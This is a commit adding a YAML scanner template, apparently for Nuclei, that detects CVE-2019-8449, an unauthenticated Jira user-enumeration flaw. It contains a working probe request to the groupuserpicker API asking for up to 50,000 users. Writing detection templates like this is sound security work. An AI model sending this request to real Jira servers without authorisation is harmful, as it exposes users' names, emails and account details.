Create CVE-2019-8449.yaml

CVE-2019-8449 which allows an Unauthenticated Attacker to enumerate all the users and their information such as Username, Avatars, Emails, Keys, etc.
Reference - https://www.doyler.net/security-not-included/more-jira-enumeration
patch-1
Harsh Bothra 2020-06-30 16:06:15 +05:30 committed by GitHub
parent ba30333045
commit d6027b67d2
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 22 additions and 0 deletions

22
cves/CVE-2019-8449.yaml Normal file
View File

@ -0,0 +1,22 @@
id: CVE-2019-8449
info:
name: JIRA Unauthenticated Sensitive Information Disclosure
author: Harsh Bothra
severity: medium
# source:- https://www.doyler.net/security-not-included/more-jira-enumeration
requests:
- method: GET
path:
- '{{BaseURL}}/rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true'
matchers:
- type: status
status:
- 200
- type: word
words:
- "users"
part: body